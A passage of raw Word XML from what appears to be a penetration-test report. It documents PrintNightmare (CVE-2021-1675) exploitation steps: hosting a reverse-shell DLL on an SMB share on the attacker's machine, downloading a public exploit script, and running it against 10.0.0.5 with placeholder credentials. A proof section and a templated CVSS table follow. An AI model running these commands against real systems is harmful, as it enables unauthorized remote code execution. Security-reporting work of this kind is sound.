                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>shell_reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="28812EEC" w14:textId="01445C8E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="58219BC3" w14:textId="061F54E1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">4.) Create </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>smb</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> server to host payload file:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="47E9056C" w14:textId="0DC90E7B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>cd /</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>/share/doc/python3-impacket/examples/</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="1A5BA4FB" w14:textId="608E60F2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>smbserver.py share `</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>` -smb2support</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="63854BBE" w14:textId="4502C8A6">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>5.) Download exploit script:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="78AEFFE3" w14:textId="58117BE9">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="Rd67b554ca80d46b4">
              <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="1370A18D" w14:textId="093D380E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>6.) Execute exploit script:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="23ADDE34" w14:textId="087656BF">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 CVE-2021-1675.py </w:t>
            </w:r>
            <w:hyperlink r:id="R174f7ea41e244b89">
              <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>kkms/&lt;user&gt;:&lt;password&gt;@10.0.0.5</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> '</w:t>
            </w:r>
            <w:hyperlink>
              <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>\\&lt;kali</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP&gt;/share/shell.dll'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="1F88B4D1">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9488" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="6FC074E3" w14:textId="3ABD16A7">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="2D8F16FE">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9488" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="72E31AA8" w14:textId="0470756E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="0EE3D474" w14:textId="1A4012FF">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline wp14:editId="5A1665AA" wp14:anchorId="5CCCC114">
                  <wp:extent cx="4572000" cy="876300"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="44209277" name="" title=""/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="Rf48112ec1bf14af2">
                            <a:extLst>
                              <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4572000" cy="876300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="1F59C635" w14:textId="7C92F7E0">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline wp14:editId="08D7419E" wp14:anchorId="3D17A835">
                  <wp:extent cx="4572000" cy="2428875"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1353679592" name="" title=""/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="R9564777146d54ee5">
                            <a:extLst>
                              <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4572000" cy="2428875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="057F54EF" w14:textId="347CFEF2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10206" w:type="dxa"/>
        <w:tblInd w:w="289"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Layout w:type="fixed"/>
        <w:tblLook w:val="0420" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1524"/>
        <w:gridCol w:w="2018"/>
        <w:gridCol w:w="1984"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="427"/>
        <w:gridCol w:w="2410"/>
      </w:tblGrid>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="12EEFEB3" w14:textId="77777777">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000104" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>CVSS Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4002" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B050"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000105" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{@cvss.cellColor}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000106" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>cvss.baseSeverity</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
